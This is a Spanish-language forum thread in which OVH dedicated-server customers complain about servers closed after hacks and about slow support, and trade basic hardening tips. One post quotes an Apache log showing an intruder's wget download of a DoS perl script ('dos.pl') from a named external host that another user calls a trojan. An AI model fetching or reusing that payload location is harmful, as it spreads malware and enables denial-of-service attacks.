Servidor dedicado "hacked" que no reabren
tonysanchez
25/10/2009, 14:43
Yo puedo confirmar.
1.- Que a un cliente que le llevo el outsourcing (managed) con failover (copia clon en una de mis maquinas) le cerraron el srver
2.- Que OVH cerro el server
3.- Que el exploit y su actividad estaban clonadas en el servidro mio.
4.- Que como no me gusta discutir con quien no se puede discutir...(ya lo he intentado y algunas conversaciones son de besugos, donde alfinal yo soy tan besugo como el otro) analizo mi copia failover del cliente. Localizo exploit, bug, y pista. (Esto mientras funciona el failover por supuesto.
5.- Acto seguido formateo maquina del cliente y despues paso de failover a maestro.
La diferencia de este proceso, es que no tengo que oir a nadie, que me cuente peliculas de tecnico de FP a las ordenes de guru-boss, ni ademas tener que esperar 72 horas si pasa en fin de semana, (a partir de la 16:45 minutos casi no existimos), ni 4 horas entre respuesta boba que no lleva a la soculión e nada (bueno y mucho menos que me contesten el ticket 5 dias depsues.... )
Un kemsiurve con 4 de 1,5 (para tener copias de alta disponibilidad en un FTP que no esta caido 5 dias) y pista...
Saludos.
A mi tambien me interesa saberlo. Siempre estoy abierto a alternativas.
El unico server que me cerraron ha sido la unica maquina windows que he tenido. (Windows directamente, Windows sobre VMWare no me ha pasado)
Hola ryn
Me puedes decir en privado donde has movido tus servidores ?
Publicado inicialmente por
kennysamuerto
Yo esque no puedo opinar porque tengo muchisimos servidores y hasta el momento no me han cerrado ninguno, y espero que asi siga.
Pero segun Vidal, de OVH, ellos reabren todos los servidores si realmente se encuentra el fallo. Si se dice es este el fallo, pero los tecnicos dicen que ese no es, te obligan a formatear.
Esque claro, obtienes feedbacks de las dos partes, las que se quejan y las que se defienden, y no sabes a quien creer.
Yo por mi parte, espero no poder posicionarme nunca, significara que nunca he tenido este problema.
De todos modos comparto que una gran empresa (ni pequeña) puede tener el servicio cerrado. Pero tambien digo que si me pasa a mi tengo alternativas para solucionarlo en poco tiempo (migraciones a otros servidores, por ejemplo). En fin, que a quien le pase le deseo suerte ,de verdad, pero tambien que cuiden un minimo la seguridad que no cuesta mucho.
Hacer unos minimos, muy minimos cambios en la seguridad, te garantiza eliminar un alto porcentaje de problemas.
Saludos
Yo espere esos dos dias por que via telefono el soporte en España me dijo que si tenia tan claro el fallo de seguridad que me lo reabririan... puse un post por aqui en el foro y un usuario me comento que no esperase eso que nunca lo hacen, no le crei y pense que al haber encontrado el fallo si que lo abririan, pero este usuario tenia razon y el esperar dos dias con el server asi fue por la esperanza que lo abriesen.
Mi empresa es de cine y vendemos contenido por internet asi que tengo muchos gigas en mis servidores de videos por lo que hacer un cambio a otro server me lleva muchas muchas horas (unas 30 webs, unos 200 gigas de videos) de hay que me jodiese esos dos dias haber si me abrian el server.
Realmente te deseo a ti y a todos que eso no te pase nunca, yo tambien pense que a mi no me pasaria... hasta que un dia je,je.
...RYN...
kennysamuerto
24/10/2009, 20:26
Publicado inicialmente por
ryn
Esta claro que siempre hay que cuidar la seguridad del server al maximo, pero en informatica no hay nada fiable al 100% asi que hasta el mas seguro puede ser hackeado.
Y la forma de trabajar de ovh no es logica, en mi caso me cerrarron un servidor por el mismo motivo, accedi por ftp y encontre el fallo, me colaron un archivo php por un script de intercambio de visitas (linkex), escribi a soporte españa y les llame y les comente esto, me dijeron que si tenia tan claro donde estaba el fallo de seguridad que no habria problema en reabrir el server, tras 2 dias esperando respuesta con el server cerrado me dicen desde francia que hay que formatear.
Asi que ante esta forma de actuar preferi cambiar mis servidores a otra empresa.
Todos podemos sufrir un ataque y para una empresa seria como es mi caso no puedo permitirme tener caido el servidor varios dias y mas sabiendo y habiendo solucionado el fallo de seguridad.
...RYN...
Yo esque no puedo opinar porque tengo muchisimos servidores y hasta el momento no me han cerrado ninguno, y espero que asi siga.
Pero segun Vidal, de OVH, ellos reabren todos los servidores si realmente se encuentra el fallo. Si se dice es este el fallo, pero los tecnicos dicen que ese no es, te obligan a formatear.
Esque claro, obtienes feedbacks de las dos partes, las que se quejan y las que se defienden, y no sabes a quien creer.
Yo por mi parte, espero no poder posicionarme nunca, significara que nunca he tenido este problema.
De todos modos comparto que una gran empresa (ni pequeña) puede tener el servicio cerrado. Pero tambien digo que si me pasa a mi tengo alternativas para solucionarlo en poco tiempo (migraciones a otros servidores, por ejemplo). En fin, que a quien le pase le deseo suerte ,de verdad, pero tambien que cuiden un minimo la seguridad que no cuesta mucho.
Hacer unos minimos, muy minimos cambios en la seguridad, te garantiza eliminar un alto porcentaje de problemas.
Saludos
Publicado inicialmente por
kennysamuerto
Lo primero de todo, deberiais aprender a establecer una seguridad minima en vuestro servidor.
Por ejemplo:
¿Teneis cambiado el puerto SSH?
Teneis que usar un sistema de Firewall que bloquee los scans cuando pasan de...
Teneis que tener un sistema para que al loguear en el ssh no permita mas de X segundos.
Teneis que tener un sistema para que al loguearse el password se logee en x segundos.
Tambien estaria bien no permitir el logueo root, y usar sudo, o en su defecto, activarlo solo cuando os sea necesario.
etc.
Probablemente no tengais nada de esto. Es facil quejarse, pero es un consejo, teneis que intentar que no os pase. Es logico que OVH cierre los servidores hackeados, porque ese hack permite que se hagan cosas con la maquina que no deberia.
Ademas, os recomiendo una lectura mas constante de los logs. Si los leeis cada 6-12 horas probablemente lo pilleis antes que OVH, y os de tiempo a resolverlo.
Es un consejo, no lo tomeis a mal.
Esta claro que siempre hay que cuidar la seguridad del server al maximo, pero en informatica no hay nada fiable al 100% asi que hasta el mas seguro puede ser hackeado.
Y la forma de trabajar de ovh no es logica, en mi caso me cerrarron un servidor por el mismo motivo, accedi por ftp y encontre el fallo, me colaron un archivo php por un script de intercambio de visitas (linkex), escribi a soporte españa y les llame y les comente esto, me dijeron que si tenia tan claro donde estaba el fallo de seguridad que no habria problema en reabrir el server, tras 2 dias esperando respuesta con el server cerrado me dicen desde francia que hay que formatear.
Asi que ante esta forma de actuar preferi cambiar mis servidores a otra empresa.
Todos podemos sufrir un ataque y para una empresa seria como es mi caso no puedo permitirme tener caido el servidor varios dias y mas sabiendo y habiendo solucionado el fallo de seguridad.
...RYN...
Si, pero también ellos deben enviar un mail de que hay hack y no cortar directamente sin previo aviso. Su aviso es el cierre del servidor y listo, dejas tirado a la gente.
Luego su soporte técnico no hace nada (ya que de la última vez que me lo cerraron, no volvieron a darme respuesta alguna tras varios mails solicitando acceso SSH) y tienes que aguantar las llamadas de los clientes con quejas de los emails.
Ahora mismo me pasa lo mismo y sin acceso SSH y ya no se que haré, ya que si su SAT no hace nada, me tienen colgado.
kennysamuerto
03/09/2009, 16:46
Lo primero de todo, deberiais aprender a establecer una seguridad minima en vuestro servidor.
Por ejemplo:
¿Teneis cambiado el puerto SSH?
Teneis que usar un sistema de Firewall que bloquee los scans cuando pasan de...
Teneis que tener un sistema para que al loguear en el ssh no permita mas de X segundos.
Teneis que tener un sistema para que al loguearse el password se logee en x segundos.
Tambien estaria bien no permitir el logueo root, y usar sudo, o en su defecto, activarlo solo cuando os sea necesario.
etc.
Probablemente no tengais nada de esto. Es facil quejarse, pero es un consejo, teneis que intentar que no os pase. Es logico que OVH cierre los servidores hackeados, porque ese hack permite que se hagan cosas con la maquina que no deberia.
Ademas, os recomiendo una lectura mas constante de los logs. Si los leeis cada 6-12 horas probablemente lo pilleis antes que OVH, y os de tiempo a resolverlo.
Es un consejo, no lo tomeis a mal.
Estoy probando, pero me dicen continuamente que el estado del servidor bloquea esa función
Pues fozando por el panel del control del Manager, he cambiado el netbook por HD y he recuperado el servidor sin ayuda del soporte. De hecho, sigo mirando los puestos que me dicen del ataque y están cerrados.
Igual te funciona a ti. Cambiar el netbook por HD y reiniciar el equipo. Luego modificas lo que sea o reinstalas.
Se debieron hartar de mis mails, ya que ahora desconectaron el servidor.
Publicado inicialmente por
xico1984
djbuly Plis edita ese enlace, que tiene un troyano como una casa de grande...
Editado. Mi antivirus también lo ha detectado como tal... pero no tienen pinta de afectar a maquinas windows...
xico1984
03/09/2009, 11:31
Publicado inicialmente por
djbuly
Creo que acabo de encontrar por donde han entrado y me han colado un script perl. En el error.log del apache:
mkdir: cannot create directory ` ': File exists
--09:10:18--
=> `dos.pl'
Resolving krk9.inode.at... 213.229.33.130
Connecting to krk9.inode.at|213.229.33.130|0... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,623 (28K) [text/x-perl]
0K .......... .......... ....... 100% 428.44 KB/s
09:10:18 (428.44 KB/s) - `dos.pl' saved [28623/28623]
djbuly Plis edita ese enlace, que tiene un troyano como una casa de grande...
Creo que acabo de encontrar por donde han entrado y me han colado un script perl. En el error.log del apache:
mkdir: cannot create directory ` ': File exists
--09:10:18--
http://krk9.xxode.at/dos.pl
=> `dos.pl'
Resolving krk9.inode.at... 213.229.33.130
Connecting to krk9.inode.at|213.229.33.130|0... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,623 (28K) [text/x-perl]
0K .......... .......... ....... 100% 428.44 KB/s
09:10:18 (428.44 KB/s) - `dos.pl' saved [28623/28623]
Publicado inicialmente por
oscar8x
¿Y el hack fue tipo "scan"?
Lo que más me jode de todo es que recomendé OVH a varias personas y de esas, 5 tienen entre 1-3 servidores con ellos. Les dije que su soporte era muy bueno, ya que resolvían las dudas rápido.
Les voy a comentar que hagan backups con más frecuencia en alojamientos externos, ya que se pueden quedar colgados como me pasa a mi ahora. Desde luego, que despues de esta no lo recomiendo a nadie.
Fue tipo DDos.
Desde luego que tampoco me pondré yo a recomendar. Lo que mas me fastidia es que mi servidor se renovó ayer y era de la gama 08, podría haber aprovechado todo esto para cambiarlo por la nueva gama
Publicado inicialmente por
djbuly
Si, es un kimsufi. El ultimo mail que recibí de OVH voy ayer sobre las 8 de la tarde diciendo que habían solicitado el modo rescue-ssh. Desde entonces nada.
¿Y el hack fue tipo "scan"?
Lo que más me jode de todo es que recomendé OVH a varias personas y de esas, 5 tienen entre 1-3 servidores con ellos. Les dije que su soporte era muy bueno, ya que resolvían las dudas rápido.
Les voy a comentar que hagan backups con más frecuencia en alojamientos externos, ya que se pueden quedar colgados como me pasa a mi ahora. Desde luego, que despues de esta no lo recomiendo a nadie.
En mis logs lo único raro que he encontrado ha sido esto:
Sep 1 10:52:35 ks35 named[17548]: client 205.166.76.11#45823: query (cache) '144.142.121.91.in-addr.arpa/PTR/IN' denied
Sep 1 10:52:53 ks35 named[17548]: client 192.195.204.8#35689: query (cache) '144.142.121.91.in-addr.arpa/PTR/IN' denied
Publicado inicialmente por
oscar8x
Que tipo de servidor tenías, ¿kimsufi?
Yo les envio un mail cada 30 minutos - 1 hora para que se aburren de mi, pero no me pueden hacer eso, y más cuando en los logs no veo rastro de la ip que me dicen.
Si no fuese por el Plesk, que no se como quedará una copia de seguridad copiando sólo el directorio, ya lo hubiese reinstalado, ya que el servicio que ofrecen es malo. No se puede tener a una persona tanto tiempo sin el servidor por no habilitar el ssh.
Si, es un kimsufi. El ultimo mail que recibí de OVH voy ayer sobre las 8 de la tarde diciendo que habían solicitado el modo rescue-ssh. Desde entonces nada.
Publicado inicialmente por
djbuly
Estoy en el mismo caso, me cerraron el server el día 1 a las 10 de la mañana, me dicen que han solicitado una reapertura en modo rescue-ssh y sigo esperando. Ya han pasado 72 horas.
Que tipo de servidor tenías, ¿kimsufi?
Yo les envio un mail cada 30 minutos - 1 hora para que se aburren de mi, pero no me pueden hacer eso, y más cuando en los logs no veo rastro de la ip que me dicen.
Si no fuese por el Plesk, que no se como quedará una copia de seguridad copiando sólo el directorio, ya lo hubiese reinstalado, ya que el servicio que ofrecen es malo. No se puede tener a una persona tanto tiempo sin el servidor por no habilitar el ssh.
xico1984
03/09/2009, 10:40
Esta es otra de las maravillas de OVH, si te juanquean el servidor, estáis "jodidos". Por eso siempre hay que tener copias de seguridad en OVH...
Estoy en el mismo caso, me cerraron el server el día 1 a las 10 de la mañana, me dicen que han solicitado una reapertura en modo rescue-ssh y sigo esperando. Ya han pasado 72 horas.
Publicado inicialmente por
carlose
Un buen rato si que te pegarías sí. Lo de plesk ni idea que no lo he tocado nunca.
Espero que haya suerte y te reabran pronto...
Gracias, pero no creo que tenga esa suerte. Los del soporte ni me contestan y ya envié mails subidos de tono porque es increible que puedan hacerte estas cosas.
Y como te tienen atado, pues te tienes que .....
Publicado inicialmente por
oscar8x
No tengo, podría pedírselo a un amigo, aunque el problema lo veo en el Plesk, que sin ssh o vía web no se hacer backup.
Pero como la copia por ftp serían muchíiiisimos archivos pequeños, pues a saber lo que tarda también. El backup que hice en mi equipo me tardó 10 horas.
Un buen rato si que te pegarías sí. Lo de plesk ni idea que no lo he tocado nunca.
Espero que haya suerte y te reabran pronto...
Publicado inicialmente por
carlose
Entonces la cosa se complica... Es una pena no poder hacer nada hasta que te lo abran por ssh....
Además he leído por aquí que alguien solicitó eso y al tiempo le contestaron que no podían darle acceso ssh, que reinstalara: http://foros.ovh.es/showpost.php?p=25111&postcount=2 . Otro servidor no tienes para pasarlo por ftp aunque sea?
No tengo, podría pedírselo a un amigo, aunque el problema lo veo en el Plesk, que sin ssh o vía web no se hacer backup.
Pero como la copia por ftp serían muchíiiisimos archivos pequeños, pues a saber lo que tarda también. El backup que hice en mi equipo me tardó 10 horas.
Publicado inicialmente por
oscar8x
No miré eso, en principio en el panel de control lo permite. El caso es que tengo 15Gb de datos que como no tengo acceso ssh, no puedo comprimir para volcar al disco usb contratado.
Es que tan sólo les pedi apertura ssh en un principio, aunque también quiero hacer backup del plesk para reinstalar. Tengo a los clientes llamándome constantemente y estoy de los nervios.
Entonces la cosa se complica... Es una pena no poder hacer nada hasta que te lo abran por ssh....
Además he leído por aquí que alguien solicitó eso y al tiempo le contestaron que no podían darle acceso ssh, que reinstalara:
http://foros.ovh.es/showpost.php?p=25111&postcount=2 . Otro servidor no tienes para pasarlo por ftp aunque sea?
Publicado inicialmente por
carlose
Me pasó algo similar, pedí acceso para buscar el problema y a las 24 horas de espera decidí reinstalarlo, acabé antes.
Les mandé un email diciendo que al final había decidido reinstalar. Me descargue desde el ftp los logs por si descubría algo y me descargué las webs a otro servidor. Y luego a reinstalar e intentar hacerlo más seguro para que no se repita...
Para reinstalarlo no hace falta que te lo reabran. No te deja?
No miré eso, en principio en el panel de control lo permite. El caso es que tengo 15Gb de datos que como no tengo acceso ssh, no puedo comprimir para volcar al disco usb contratado.
Es que tan sólo les pedi apertura ssh en un principio, aunque también quiero hacer backup del plesk para reinstalar. Tengo a los clientes llamándome constantemente y estoy de los nervios.
Publicado inicialmente por
oscar8x
Hace 32 horas que me cerraron el servidor por hack (Scan) y me enviaron un mail indicando el motivo y que debería solucionarlo y que se abría el ftp en modo lectura.
El caso que solicité la reapertura del servidor para reinstalarlo y poder hacer un backup en la unidad usb y no me lo han abierto despues de 24 horas desde dicha solicitud.
¿Es normal que dejen colgado a un cliente tanto tiempo?
Me pasó algo similar, pedí acceso para buscar el problema y a las 24 horas de espera decidí reinstalarlo, acabé antes.
Les mandé un email diciendo que al final había decidido reinstalar. Me descargue desde el ftp los logs por si descubría algo y me descargué las webs a otro servidor. Y luego a reinstalar e intentar hacerlo más seguro para que no se repita...
Para reinstalarlo no hace falta que te lo reabran. No te deja?
Hace 32 horas que me cerraron el servidor por hack (Scan) y me enviaron un mail indicando el motivo y que debería solucionarlo y que se abría el ftp en modo lectura.
El caso que solicité la reapertura del servidor para reinstalarlo y poder hacer un backup en la unidad usb y no me lo han abierto despues de 24 horas desde dicha solicitud.
¿Es normal que dejen colgado a un cliente tanto tiempo?
